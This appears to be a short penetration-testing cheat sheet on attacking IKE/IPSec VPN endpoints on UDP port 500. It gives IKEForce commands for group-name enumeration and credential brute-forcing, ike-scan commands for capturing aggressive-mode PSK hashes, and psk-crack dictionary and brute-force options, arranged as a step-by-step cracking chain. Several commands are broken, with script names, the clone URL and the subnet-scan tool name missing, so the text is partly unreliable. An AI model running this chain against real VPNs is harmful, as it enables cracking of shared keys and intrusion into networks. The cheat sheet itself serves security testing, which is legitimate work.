500 - IKE

IKE is aprt of IPSec protocol, which is part of VPN's, it uses UDP port 500


Use IKEForce to enumerate or dictionary attack VPN servers.
pip install pyip
git clone
Perform IKE VPN enumeration with IKEForce:
./ TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1


ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE Aggressive Mode PSK Cracking
  1. 1.
    Identify VPN Servers
  2. 2.
    Enumerate with IKEForce to obtain the group ID
  3. 3.
    Use ike-scan to capture the PSK hash from the IKE endpoint
  4. 4.
    Use psk-crack to crack the hash
Step 1: Identify IKE Servers (uses
./ -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
Some more advanced psk-crack options below:
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
Last modified 1yr ago